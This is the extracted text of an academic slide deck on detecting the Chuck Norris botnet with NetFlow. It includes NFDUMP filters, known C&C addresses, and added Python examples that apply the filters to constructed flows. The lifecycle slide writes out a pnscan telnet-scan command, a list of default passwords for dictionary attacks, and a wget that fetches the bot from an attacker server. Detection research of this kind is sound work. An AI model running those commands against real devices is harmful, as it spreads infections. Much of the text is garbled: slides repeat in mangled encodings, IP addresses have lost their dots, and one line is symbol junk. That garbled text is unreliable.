Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
list of C classnetworks to scan
1472513x14725118x
14725120x
1472514x
TCP23
NFDUMP detection filter(net local_network) and (dst port 23) and (proto TCP)
and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
list of C classnetworks to scan
1472513x14725118x
14725120x
1472514x
TCP23
1961428x
2141283x
NFDUMP detection filter(net local_network) and (dst port 23) and (proto TCP)
and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
list of C classnetworks to scan
1472513x14725118x
14725120x
1472514x
TCP23
1961428x
2141283x
SYNRESET flags
NFDUMP detection filter(net local_network) and (dst port 23) and (proto TCP) and
((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
NFDUMP detection filter
(src net local_network) and (dst ip web_servers1) and(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and (dst ip web_servers1) and(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
botnetdistributionweb server
botnetdistributionweb server
botnetdistributionweb server
NFDUMP detection filter(src net local_network) and (dst ip web_servers1)
and(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
botnetdistributionweb server
botnetdistributionweb server
botnetdistributionweb server
TCP80
NFDUMP detection filter(src net local_network) and (dst ip web_servers1) and
(dst port 80) and (proto TCP)
and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
botnetdistributionweb server
botnetdistributionweb server
botnetdistributionweb server
TCP80SYNACK flags
NFDUMP detection filter(src net local_network) and (dst ip web_servers1) and
(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
NFDUMP detection filter
(src net local_network) and (dst ip IRC_server 2) and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and (dst ip IRC_server 2) and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2)
and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
TCP1200
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2) and
(dst port 1200) and (proto TCP)
and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
TCP1200SYNACK flags
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2) and
(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
NFDUMP detection filter
(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or
(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
spoofedDNS server
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4))
and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
spoofedDNS server
UDP53
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
ADSL String Detection
Looking for ADSL String
ADSL string indicates Chuck Norris botnetSearching in victimrsquos hostname or victimrsquos WHOISQuering DNS server and parsing recieved hostnameQuering WHOIS database and parsing recieved info
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 18 28
+
13131313
$amp()+--amp130+(amp0(131$2 13133+13133++ampamp45(331+605+70138913$13+-
amp3133+913($2-+(-amp3 lt$$2 2=gtlt$$21313913$+7013+-
1313130 $ 0$1
adsl
196192572
Detected Chuck Norris Servers
Known IP Addresses
Web server addresses 8798173190 879816386IRC server addresses 8798173190 879816386IRC server port 12000OpenDNS server addresses 2086722222220867220220Spoofed DNS server 879816386
This data is used in detection methods by default
IP addresses updates are published at project page
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 19 28
Part IV
NfSen Botnet Detection Plugin
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 20 28
Botnet Detection Plugin
Plugin Features
Detects Chuck Norris-like botnet behaviorBased on NetFlow and other network data sourcesProcesses data regularly and provides real-time output
Plugin Architecture
Compliant with NfSen plugins architecture recommendationsPHP frontend with a Perl backend and a PostgreSQL DBWeb e-mail and syslog detection output and reporting
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 21 28
Plugin Architecture
Diagram: BACKEND and FRONTEND. The backend module cndet.pm talks to the frontend cndet.php through the nfsend comm interface; the backend's cndetdb.pm takes NetFlow data, DNS and the WHOIS db as inputs and keeps its results in PostgreSQL.
Plugin Methods Architecture
Diagram: cndetdb.pm, backed by PostgreSQL, draws on NetFlow data, DNS and the WHOIS db and hosts the five detection methods:
Telnet scan detection
Botnet distribution sites detection
Botnet C&C centers detection
DNS spoofing attack detection
ADSL string detection
Web Interface – Infected Host Detected
Part V
Conclusion
Detection Plugin and Other Botnets
Botnet Lifecycle Similar for Majority of Botnets
scanning for possible bots
infection of vulnerable devices
bot initialization/update
botnet operation
Botnet Detection Plugin Customization
modular plugin engine
easy modification for detection of other botnets
we need to customize the detection methods
plugin distributed under the BSD license
Conclusion
Network Devices Are Not Protected
Routers, access points, printers, cameras, TVs
No AV software, missing patches and firmware updates
But they should be protected
Experience
NetFlow can monitor all such devices in the network
Discovery of the new Chuck Norris botnet using NetFlow
Developed a specialized NfSen plugin for Chuck Norris botnet detection
Future
Chuck Norris is down but others are coming (e.g. Stuxnet)
We are open to research collaboration
Detection plugin is available at our project site
Thank You For Your Attention
Vojtěch Krmíček, Tomáš Plesník
vojtec|plesnik@ics.muni.cz
Project CYBER: http://www.muni.cz/ics/cyber
Detecting Botnets with NetFlow
This material is based upon work supported by the Czech Ministry of Defence under Contract No. OVMASUN200801.
Botnet Lifecycle
Scanning for vulnerable devices in predefined networks
IP prefixes of ADSL networks of worldwide operators
network scanning – pnscan -n30 88102106024 23
Infection of a vulnerable device
TELNET dictionary attack – 15 default passwords
admin, password, root, 1234, dreambox, blank password
IRC bot initialization
IRC bot download and execution on the infected device: wget http879816386pwnsyslgd
Botnet C&C operations
further bot spreading and C&C command execution
DNS spoofing and denial-of-service attacks
More about Chuck Norris Botnet
The Chuck Norris botnet lifecycle in detail and further information are available at the CYBER project page:
http://www.muni.cz/ics/cyber/chuck_norris_botnet
Diagram: the bot on the infected device (1) joins #soldiers on the C&C (IRC) server, (2) receives the channel topic init-cmd (get scan-tools), (3) wgets the scan-tools from the web server; STOP: stop remote access (ports 22-80).
Part III
Botnet Detection Methods
Detection Methods Overview
Five Detection Methods
Telnet scan detection
Connections to botnet distribution sites detection
Connections to botnet C&C centers detection
DNS spoofing attack detection
ADSL string detection
Methods Correspond to Botnet Lifecycle
Applied to NetFlow Data
Defined as NFDUMP filters
Implemented in the NfSen collector
Telnet Scan Detection – Phase I
Incoming and outgoing TCP SYN scans on port 23
Diagram: the infected device in the local network sends TCP/23 probes (SYN/RESET flags) to a list of class C networks to scan (147.251.3.x, 147.251.18.x, 147.251.20.x, 147.251.4.x and further remote networks).
NFDUMP detection filter:
  (net local_network) and (dst port 23) and (proto TCP) and
  ((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Connections to Botnet Distribution Sites – Phase II
Bot's web download requests from the infected host
Diagram: the infected device in the local network opens TCP/80 connections (SYN/ACK flags) to the botnet distribution web servers.
NFDUMP detection filter:
  (src net local_network) and (dst ip web_servers [1]) and
  (dst port 80) and (proto TCP) and (flags SA and not flag R)
[1] IP addresses of the attacker's botnet distribution web servers
Connections to Botnet C&C Center – Phase III
Bot's IRC traffic with the command and control center
Diagram: the infected device in the local network opens TCP/1200 connections (SYN/ACK flags) to the botnet C&C server.
NFDUMP detection filter:
  (src net local_network) and (dst ip IRC_server [2]) and
  (dst port 1200) and (proto TCP) and (flags SA and not flag R)
[2] IP address of the attacker's IRC server (botnet C&C center)
DNS Spoofing Attack Detection – Phase IV
Attacker's DNS or OpenDNS Queries
Common DNS requests forwarded to OpenDNS servers
Targeted DNS requests forwarded to the attacker's spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
E.g. Facebook or banking sites
Diagram: the infected device in the local network sends UDP/53 queries to an OpenDNS server and to the spoofed DNS server.
NFDUMP detection filter:
  (src net local_network) and ((dst ip OpenDNS servers [3]) or
  (dst ip DNS servers [4])) and (proto UDP) and (dst port 53)
[3] IP addresses of the common OpenDNS servers
[4] IP addresses of the attacker's spoofed DNS servers
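The four NFDUMP filters above (Phases I-IV) re-expressed as Python predicates and run over constructed flow records, as an added example that is not the authors' NfSen plugin; the monitored prefix 10.0.0.0/24, the flow line format and the scan threshold are assumptions, while the server addresses are those listed on the Detected Chuck Norris Servers slide.

```python
"""Phase I-IV NFDUMP filters from the slides, re-expressed as Python predicates.
Added example, not the authors' NfSen plugin. Sample flows are constructed;
the monitored prefix, the line format and the scan threshold are assumptions."""
from collections import defaultdict
from ipaddress import IPv4Address, ip_address, ip_network
from typing import Dict, FrozenSet, Iterable, NamedTuple

LOCAL_NET = ip_network("10.0.0.0/24")          # assumed monitored prefix
# Server addresses as listed on the "Detected Chuck Norris Servers" slide.
WEB_SERVERS = {ip_address("87.98.173.190"), ip_address("87.98.163.86")}
IRC_SERVERS = {ip_address("87.98.173.190"), ip_address("87.98.163.86")}
IRC_PORT = 1200                                # port tested by the Phase III filter
OPENDNS_SERVERS = {ip_address("208.67.222.222"), ip_address("208.67.220.220")}
SPOOFED_DNS_SERVERS = {ip_address("87.98.163.86")}
TCP, UDP = 6, 17
SCAN_THRESHOLD = 3   # distinct telnet peers before a host is reported (assumed)

class Flow(NamedTuple):
    src: IPv4Address
    sport: int
    dst: IPv4Address
    dport: int
    proto: int
    flags: FrozenSet[str]     # TCP flag letters seen in the flow: S A R P U F

def parse_flow(line: str) -> Flow:
    """Parse one 'src,sport,dst,dport,proto,flags' line; '#' starts a comment."""
    src, sport, dst, dport, proto, flags = line.split("#")[0].strip().split(",")
    return Flow(ip_address(src), int(sport), ip_address(dst), int(dport),
                int(proto), frozenset(flags.replace(".", "")))

def phase1_telnet_scan(f: Flow) -> bool:
    # (net local_network) and (dst port 23) and (proto TCP) and
    # ((flags S and not flags ARPUF) or (flags SR and not flags APUF))
    return ((f.src in LOCAL_NET or f.dst in LOCAL_NET) and f.dport == 23
            and f.proto == TCP and f.flags in ({"S"}, {"S", "R"}))

def phase2_distribution_site(f: Flow) -> bool:
    # (src net local_network) and (dst ip web_servers) and (dst port 80)
    # and (proto TCP) and (flags SA and not flag R)
    return (f.src in LOCAL_NET and f.dst in WEB_SERVERS and f.dport == 80
            and f.proto == TCP and {"S", "A"} <= f.flags and "R" not in f.flags)

def phase3_cc_center(f: Flow) -> bool:
    # Same shape as Phase II, against the IRC server and its port.
    return (f.src in LOCAL_NET and f.dst in IRC_SERVERS and f.dport == IRC_PORT
            and f.proto == TCP and {"S", "A"} <= f.flags and "R" not in f.flags)

def phase4_dns_spoofing(f: Flow) -> bool:
    # (src net local_network) and ((dst ip OpenDNS servers) or (dst ip DNS servers))
    # and (proto UDP) and (dst port 53)
    return (f.src in LOCAL_NET and f.dst in (OPENDNS_SERVERS | SPOOFED_DNS_SERVERS)
            and f.proto == UDP and f.dport == 53)

def detect(lines: Iterable[str]) -> Dict[str, dict]:
    """Run all four filters; return, per method, the local hosts implicated."""
    scan_out: Dict[str, set] = defaultdict(set)    # local scanner -> targets
    scan_in: Dict[str, set] = defaultdict(set)     # local target -> remote scanners
    hits = {k: defaultdict(set) for k in ("distribution_site", "cc_center", "dns_spoofing")}
    for line in lines:
        if not line.split("#")[0].strip():
            continue                                # blank or comment-only line
        f = parse_flow(line)
        if phase1_telnet_scan(f):
            if f.src in LOCAL_NET:
                scan_out[str(f.src)].add(str(f.dst))
            else:
                scan_in[str(f.dst)].add(str(f.src))
        if phase2_distribution_site(f):
            hits["distribution_site"][str(f.src)].add(str(f.dst))
        if phase3_cc_center(f):
            hits["cc_center"][str(f.src)].add(str(f.dst))
        if phase4_dns_spoofing(f):
            hits["dns_spoofing"][str(f.src)].add(str(f.dst))
    # One SYN to port 23 is not a scan: report a host only once it has touched
    # (or been touched by) SCAN_THRESHOLD distinct peers.
    report = {k: dict(v) for k, v in hits.items()}
    report["telnet_scan_out"] = {h: len(t) for h, t in scan_out.items() if len(t) >= SCAN_THRESHOLD}
    report["telnet_scan_in"] = {h: len(t) for h, t in scan_in.items() if len(t) >= SCAN_THRESHOLD}
    return report

SAMPLE_FLOWS = """\
# constructed sample: src,sport,dst,dport,proto,flags
10.0.0.7,41000,203.0.113.10,23,6,S
10.0.0.7,41001,203.0.113.11,23,6,S
10.0.0.7,41002,203.0.113.12,23,6,SR      # the filter's second (SYN+RST) form
10.0.0.7,41005,203.0.113.15,23,6,SPA     # completed telnet session, not a probe
10.0.0.7,41100,87.98.163.86,80,6,SPA     # download from a distribution site (II)
10.0.0.7,41101,87.98.173.190,1200,6,SPA  # IRC session with the C&C server (III)
10.0.0.7,41102,208.67.222.222,53,17,.    # query to OpenDNS (IV)
10.0.0.7,41103,87.98.163.86,53,17,.      # query to the spoofed DNS server (IV)
10.0.0.9,50000,198.51.100.5,443,6,SPAF   # ordinary HTTPS, matches nothing
198.51.100.77,5555,10.0.0.20,23,6,S      # one inbound probe, below threshold
"""

if __name__ == "__main__":
    for method, found in detect(SAMPLE_FLOWS.splitlines()).items():
        print(f"{method:18} {found}")
```

Each predicate mirrors one slide's filter term by term; the threshold on distinct port-23 peers is the extra step a collector plugin needs so that a single SYN does not raise an alert.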
ADSL String Detection
Looking for ADSL String
ADSL string indicates Chuck Norris botnet
Searching in the victim's hostname or the victim's WHOIS
Querying DNS server and parsing the received hostname
Querying WHOIS database and parsing the received info
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
ADSL string detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Web Interface ndash Infected Host Detected
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 24 28
Part V
Conclusion
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 25 28
Detection Plugin and Other Botnets
Botnet Lifecycle Similar for Majority of Botnets
scanning for possible botsinfection of a vulnerable devicesbot initializationupdatebotnet operation
Botnet Detection Plugin Customization
modular plugin engineeasy modification for detection of other botnetwe need to customize detection methodsplugin distributed under the BSD license
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 26 28
ConclusionNetwork Devices Are Not Protected
Routers access points printers cameras TVs No AV software missing patches and firmware updatesBut they should be protected
ExperienceNetFlow can monitor all such devices in networkDiscovery of new Chuck Norris botnet using NetFlowDeveloped a specialized NfSen plugin for Chuck Norrisbotnet detection
FutureChuck Norris is down but others are coming (eg Stuxnet)We are open to research collaborationDetection plugin is available at our project site
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 27 28
Thank You For Your Attention
Vojtěch KrmiacutečekTomaacuteš Plesniacutekvojtec|plesnikicsmunicz
Project CYBERhttpwwwmuniczicscyber
Detecting Botnetswith NetFlow
This material is based upon work supported by theCzech Ministry of Defence under Contract No OVMASUN200801
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 28 28
Part III
Botnet Detection Methods
Krmíček, Plesník: Detecting Botnets with NetFlow, 12 / 28
Detection Methods Overview
Five Detection Methods
  Telnet scan detection
  Connections to botnet distribution sites detection
  Connections to botnet C&C centers detection
  DNS spoofing attack detection
  ADSL string detection
Methods Correspond to Botnet Lifecycle
Applied to NetFlow Data
  Defined as NFDUMP filters
  Implemented in the NfSen collector
Telnet Scan Detection – Phase I
Incoming and outgoing TCP SYN scans on port 23
[Diagram: an infected device scans a list of class C networks on TCP/23, both inside the local network (147.251.3.x, 147.251.4.x, 147.251.18.x, 147.251.20.x) and in networks outside it; the flows of interest carry SYN or SYN+RESET flags.]
NFDUMP detection filter:
  (net local_network) and (dst port 23) and (proto TCP) and
  ((flags S and not flags ARPUF) or (flags SR and not flags APUF))
The two flag clauses select flows in which only SYN, or only SYN and RST, is set, i.e. connection attempts that were never established.
Connections to Botnet Distribution Sites – Phase II
Bot's web download requests from infected host
[Diagram: an infected device in the local network connects over TCP/80 to several botnet distribution web servers; the flows of interest carry SYN and ACK flags.]
NFDUMP detection filter:
  (src net local_network) and (dst ip web_servers¹) and (dst port 80) and (proto TCP) and (flags SA and not flags R)
¹ IP addresses of the attacker's botnet distribution web servers
Connections to Botnet C&C Center – Phase III
Bot's IRC traffic with command and control center
[Diagram: an infected device in the local network connects over TCP/1200 to the botnet C&C (IRC) server; the flows of interest carry SYN and ACK flags.]
NFDUMP detection filter:
  (src net local_network) and (dst ip IRC_server²) and (dst port 1200) and (proto TCP) and (flags SA and not flags R)
² IP address of the attacker's IRC server (botnet C&C center)
DNS Spoofing Attack Detection – Phase IV
Attacker's DNS or OpenDNS Queries
  Common DNS requests forwarded to OpenDNS servers
  Targeted DNS requests forwarded to the attacker's spoofed DNS server
DNS Queries Outside Local Network
Used for Phishing Attacks
  E.g. Facebook or banking sites
[Diagram: an infected device in the local network sends UDP/53 queries to an OpenDNS server and to the spoofed DNS server.]
NFDUMP detection filter:
  (src net local_network) and ((dst ip OpenDNS servers³) or (dst ip DNS servers⁴)) and (proto UDP) and (dst port 53)
³ IP addresses of the common OpenDNS servers
⁴ IP addresses of the attacker's spoofed DNS servers
ADSL String Detection
Looking for ADSL String
  The string "adsl" in the victim's hostname or WHOIS record indicates a Chuck Norris botnet victim
  Searched in the victim's hostname or the victim's WHOIS entry
  Querying the DNS server and parsing the received hostname
  Querying the WHOIS database and parsing the received info
[Screenshot: DNS/WHOIS lookup output for a detected host, with the string "adsl" highlighted.]
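The five methods on the Phase I–IV slides and the ADSL slide above, as running detection logic. This block is an added example and is not the authors' cndet.pm code. It applies each NFDUMP filter's conditions in Python to a constructed nfdump-style CSV extract (the header follows the `nfdump -o csv` column names; every row is invented), then aggregates per host, because one SYN to port 23 is not a scan and a host that matches several lifecycle phases is a far stronger signal than one that matches one. The local network (147.251.0.0/16), the scan threshold and the PTR/WHOIS lookup tables are assumptions; the server addresses are the ones on the "Detected Chuck Norris Servers" slide, and the IRC port uses that slide's 12000 rather than the 1200 printed in the Phase III filter.

```python
"""Added example: the five Chuck Norris detection methods as offline rules (not the
plugin's cndet.pm).  Flows are a constructed CSV with `nfdump -o csv` column names;
PTR and WHOIS answers are injected dicts so everything runs without network access."""
import csv
import io
import ipaddress
from collections import defaultdict

LOCAL_NET = ipaddress.ip_network("147.251.0.0/16")   # assumption: the slides' "local_network"
DISTRIBUTION_WEB = {"87.98.173.190", "87.98.163.86"}  # slide "Detected Chuck Norris Servers"
IRC_CC = {"87.98.173.190", "87.98.163.86"}
IRC_PORT = 12000           # that slide says 12000; the Phase III filter slide prints 1200
OPENDNS = {"208.67.222.222", "208.67.220.220"}
SPOOFED_DNS = {"87.98.163.86"}
SCAN_MIN_TARGETS = 2       # assumption: distinct telnet targets before a source counts as a scanner

def flags(flg, required, forbidden):
    """nfdump semantics of `flags X and not flags Y`: all of X set, none of Y set.  nfdump
    prints the mask as six characters in the order U A P R S F, '.' = unset ('.A..S.' = SYN+ACK)."""
    present = {c for c in flg if c != "."}
    return set(required) <= present and not (set(forbidden) & present)

def is_local(ip):
    return ipaddress.ip_address(ip) in LOCAL_NET

def phase1_telnet_scan(r):
    """(net local_network) and (dst port 23) and (proto TCP) and
    ((flags S and not flags ARPUF) or (flags SR and not flags APUF))"""
    return (r["pr"] == "TCP" and r["dp"] == "23"
            and (is_local(r["sa"]) or is_local(r["da"]))
            and (flags(r["flg"], "S", "ARPUF") or flags(r["flg"], "SR", "APUF")))

def phase2_distribution(r):
    """(src net local_network) and (dst ip web_servers) and (dst port 80) and (proto TCP)
    and (flags SA and not flags R)"""
    return (is_local(r["sa"]) and r["da"] in DISTRIBUTION_WEB and r["dp"] == "80"
            and r["pr"] == "TCP" and flags(r["flg"], "SA", "R"))

def phase3_cc(r):
    """Same shape as Phase II, against the IRC C&C server and port."""
    return (is_local(r["sa"]) and r["da"] in IRC_CC and r["dp"] == str(IRC_PORT)
            and r["pr"] == "TCP" and flags(r["flg"], "SA", "R"))

def phase4_dns(r):
    """(src net local_network) and (dst ip OpenDNS or spoofed DNS) and (proto UDP) and (dst port 53)"""
    return (is_local(r["sa"]) and r["da"] in (OPENDNS | SPOOFED_DNS)
            and r["pr"] == "UDP" and r["dp"] == "53")

def phase5_adsl(host, ptr, whois):
    """Phase V: the string 'adsl' in the host's reverse name or WHOIS record."""
    return "adsl" in (ptr.get(host, "") + " " + whois.get(host, "")).lower()

def detect(csv_text, ptr, whois):
    """Run all methods over nfdump-style CSV text; return {host: set(indicators)}."""
    hits = defaultdict(set)
    scan_targets = defaultdict(set)                  # scanner -> distinct telnet targets
    for r in csv.DictReader(io.StringIO(csv_text)):
        if phase1_telnet_scan(r):
            scan_targets[r["sa"]].add(r["da"])
        if phase2_distribution(r):
            hits[r["sa"]].add("distribution_site")
        if phase3_cc(r):
            hits[r["sa"]].add("irc_cc")
        if phase4_dns(r):
            hits[r["sa"]].add("dns_spoofed" if r["da"] in SPOOFED_DNS else "dns_opendns")
    # One SYN is not a scan: require several distinct targets, and keep the direction so
    # incoming scans from outside are reported apart from infected local hosts.
    for src, targets in scan_targets.items():
        if len(targets) >= SCAN_MIN_TARGETS:
            hits[src].add("telnet_scan_out" if is_local(src) else "telnet_scan_in")
    # Phase V is enrichment: only hosts already flagged by a flow method are looked up.
    for host in list(hits):
        if phase5_adsl(host, ptr, whois):
            hits[host].add("adsl")
    return dict(hits)

# Constructed flows, not captured data: 147.251.3.25 walks the whole lifecycle; 147.251.4.7
# sends one SYN and one reset HTTP connection and must stay unreported; 203.0.113.5 scans in.
SAMPLE_FLOWS = """\
ts,te,sa,da,sp,dp,pr,flg,ipkt,ibyt
2011-01-12 10:00:01,2011-01-12 10:00:01,147.251.3.25,198.51.100.1,4021,23,TCP,....S.,1,60
2011-01-12 10:00:01,2011-01-12 10:00:01,147.251.3.25,198.51.100.2,4022,23,TCP,...RS.,2,100
2011-01-12 10:00:07,2011-01-12 10:00:09,147.251.3.25,87.98.173.190,4030,80,TCP,.AP.SF,12,1800
2011-01-12 10:00:12,2011-01-12 10:05:00,147.251.3.25,87.98.173.190,4031,12000,TCP,.AP.S.,40,2600
2011-01-12 10:00:15,2011-01-12 10:00:15,147.251.3.25,87.98.163.86,5353,53,UDP,......,1,70
2011-01-12 10:01:02,2011-01-12 10:01:02,147.251.4.7,198.51.100.9,4100,23,TCP,....S.,1,60
2011-01-12 10:01:10,2011-01-12 10:01:11,147.251.4.7,87.98.173.190,4101,80,TCP,.A.RS.,3,180
2011-01-12 10:02:00,2011-01-12 10:02:00,203.0.113.5,147.251.20.1,3333,23,TCP,....S.,1,60
2011-01-12 10:02:00,2011-01-12 10:02:00,203.0.113.5,147.251.20.2,3334,23,TCP,....S.,1,60
"""
SAMPLE_PTR = {"147.251.3.25": "cpe-3-25.adsl.example.net", "203.0.113.5": "host-5.dyn.example.org"}
SAMPLE_WHOIS = {"203.0.113.5": "descr: ADSL customer pool\norigin: AS64496"}     # both constructed

if __name__ == "__main__":
    for host, indicators in sorted(detect(SAMPLE_FLOWS, SAMPLE_PTR, SAMPLE_WHOIS).items()):
        print(host, sorted(indicators))
```

Running it reports 147.251.3.25 with all five indicators and 203.0.113.5 as an outside scanner whose WHOIS record marks it as an ADSL host; 147.251.4.7 is absent, because its HTTP flow to the distribution server carries RST and its single SYN is below the scan threshold. Against a real NfSen installation the CSV would come from nfdump and the two dicts from reverse DNS and a WHOIS client, with the rest unchanged.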
Detected Chuck Norris Servers
Known IP Addresses
  Web server addresses: 87.98.173.190, 87.98.163.86
  IRC server addresses: 87.98.173.190, 87.98.163.86
  IRC server port: 12000
  OpenDNS server addresses: 208.67.222.222, 208.67.220.220
  Spoofed DNS server: 87.98.163.86
This data is used in the detection methods by default
IP address updates are published on the project page
